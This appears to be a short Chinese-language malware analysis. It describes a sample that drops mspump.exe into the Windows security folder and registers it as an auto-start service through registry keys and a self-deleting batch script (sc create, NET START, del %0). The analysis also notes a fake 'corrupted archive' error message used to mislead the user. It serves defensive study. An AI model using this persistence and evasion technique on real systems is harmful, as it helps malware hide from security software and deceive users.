1、文件运行后会释放以下文件
%Windir%\security\mspump.exe
2、创建病毒服务项
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\mspump\DependOnService
值: 字符串: "Tcpip.."
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\mspump\DisplayName
值: 字符串: "mspump"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\mspump\ImagePath
值: 字符串: "C:\WINDOWS\security\mspump.exe."
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\mspump\Start
值: DWORD: 2 (0x2)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\mspump\Type
值: DWORD: 272 (0x110)
3、创建批处理文件使用批处理命令:
@echo off
sc create mspump binpath= "C:\WINDOWS\security\mspump.exe" displayname= "mspump" depend= Tcpip start= auto type= interact type= own
NET START "mspump"
del %0
exit添加病毒服务项,以服务方式启动病毒文件,从而达到躲避安全软件对注册表操作监控报警目的,调用MessageBox函数弹出错误消息:“这个压缩文件格式未知或者数据已经被损坏”,使用户误认为该文件已经损坏而不认为其是病毒。
|